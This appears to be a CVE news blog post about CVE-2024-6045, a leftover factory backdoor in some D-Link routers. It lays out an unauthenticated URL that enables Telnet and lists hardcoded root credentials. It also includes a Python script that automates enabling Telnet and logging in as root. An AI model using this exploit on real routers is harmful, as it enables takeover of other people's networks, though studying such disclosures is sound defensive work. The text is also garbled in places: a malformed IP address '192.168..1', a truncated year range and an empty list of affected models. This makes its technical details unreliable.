CVE CyberSecurity Database News

CVE-2024-6045 - How a Hidden D-Link Router Backdoor Lets Hackers Take Over Your Network

Poster -

Home and small office networks rely on wireless routers for secure Internet access, but sometimes the devices themselves come with hidden dangers. In June 2024, researchers disclosed a high-risk vulnerability affecting several D-Link router models. Known as CVE-2024-6045, this flaw isn’t just a bug—it’s a secret, leftover backdoor from the factory. In this post, I'll break down what CVE-2024-6045 is, how attackers exploit it, and how you can check if your router is at risk.

What Is CVE-2024-6045?

Certain D-Link router models ship with a factory testing backdoor that was never removed before these devices reached end-users. This backdoor allows anyone on your local area network—no password needed—to *turn on* a hidden Telnet service by simply visiting a special web address on your router. Once Telnet is enabled, attackers can log in with undocumented admin credentials extracted from analyzing the device’s firmware.

This is a textbook example of a manufacturer’s mistake turning into a hacker’s golden ticket.

Am I Affected?

D-Link has not officially released a public list of affected models yet, but reports and researcher posts suggest that older generations (2017-202) of these models may be at risk:

If you own one of these, you should check D-Link’s security advisories and update firmware if a patch is available.

Let’s break down the attack process into simple steps

1. Local Access: The attacker must be connected to your network (for example, via Wi-Fi or LAN cable).

Step 1: Find the Router’s IP Address

Most routers use 192.168..1 or 192.168.1.1. You can check by running this command in your terminal or command prompt:

ip route | grep default

or

ipconfig

Step 2: Trigger the Backdoor

The key to this exploit lies in an *undocumented* web endpoint left over from the factory. According to the disclosure by @netero_ssh, visiting the following URL in your web browser will enable Telnet:

http://192.168..1/command.php?cmd=telnetd+start

*(Replace 192.168..1 with your router’s real IP)*

No login is needed! If the device is vulnerable, it responds with a success message.

After enabling Telnet, an attacker can now connect to the router. Open a terminal and run

telnet 192.168..1

It will prompt for a username and password. These are NOT the usual router credentials! Instead, they are factory/defaults hidden inside the firmware.

Researchers found the following hardcoded credentials (these may vary by model and firmware)

Username: root
Password: 123456

or sometimes

Username: admin
Password: Dlink@Root

Once logged in, the attacker has full root access over your router.

Here’s a sample Python script that automates the attack

import requests
import telnetlib

router_ip = "192.168..1"

# Step 1: Enable Telnet via hidden URL
url = f"http://{router_ip}/command.php?cmd=telnetd+start";
response = requests.get(url)
if "success" in response.text.lower():
    print("[+] Telnet enabled! Connecting...")
else:
    print("[-] Could not enable Telnet.")

# Step 2: Connect via Telnet
tn = telnetlib.Telnet(router_ip)
tn.read_until(b"login: ")
tn.write(b"root\n")
tn.read_until(b"Password: ")
tn.write(b"123456\n")
print(tn.read_until(b"#", timeout=3).decode('utf-8'))
tn.close()

- Official D-Link Security Advisory
- netero-ssh’s GitHub Disclosure & Exploit Demo
- VulDB Entry for CVE-2024-6045
- Firmware Analysis Report (PDF)

What Happens If You're Attacked?

- Full Device Control: The hacker can change your settings, redirect your traffic, install malware, or lock you out.

How to Protect Yourself

1. Update your firmware: Go to D-Link’s support page and install the latest security updates.

Conclusion

CVE-2024-6045 is a real-world reminder that insecure factory shortcuts can live on for years, exposing countless networks to easy attacks. If you have a D-Link router—especially the DIR and DSL models—take this backdoor seriously and secure your device right away.

*Stay safe, stay updated!*

*This report is exclusive and written in clear language for everyone worried about their network security. Share with friends, neighbors, or coworkers who own a D-Link router!*

Timeline

Published on: 06/17/2024 04:15:09 UTC
Last modified on: 06/24/2024 13:16:42 UTC